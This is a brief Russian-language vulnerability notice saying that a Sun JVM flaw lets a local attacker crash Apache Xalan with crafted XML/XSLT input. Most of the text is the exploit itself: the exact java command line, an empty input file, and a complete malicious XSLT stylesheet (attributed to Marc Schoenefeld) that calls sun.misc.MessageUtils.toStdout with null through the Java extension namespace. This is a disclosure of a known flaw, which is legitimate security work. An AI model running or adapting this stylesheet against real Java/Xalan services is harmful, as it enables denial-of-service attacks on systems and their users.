Уязвимость в Sun JVM позволяет локальному
атакующему порушить Apache XALAN передав
поддельные XML/XSLT данные.
Command:
c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl
sunexploit.xsl
a.xml
(a/)
sunexploit.xsl
(!-- XSLT JDK-Exploit by Marc Schoenefeld , marc@at@illegalaccess.org --)
(xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sun="sun")
(xsl:template
match="/")
(xsl:variable
name="tmp"
select="sun:misc.MessageUtils.toStdout(null)"/)
(xsl:variable
name="tmp2"
select="sun:misc.MessageUtils.toStdout($tmp)"/)
(xsl:value-of
select="$tmp2" /)
(/xsl:template)
(/xsl:stylesheet)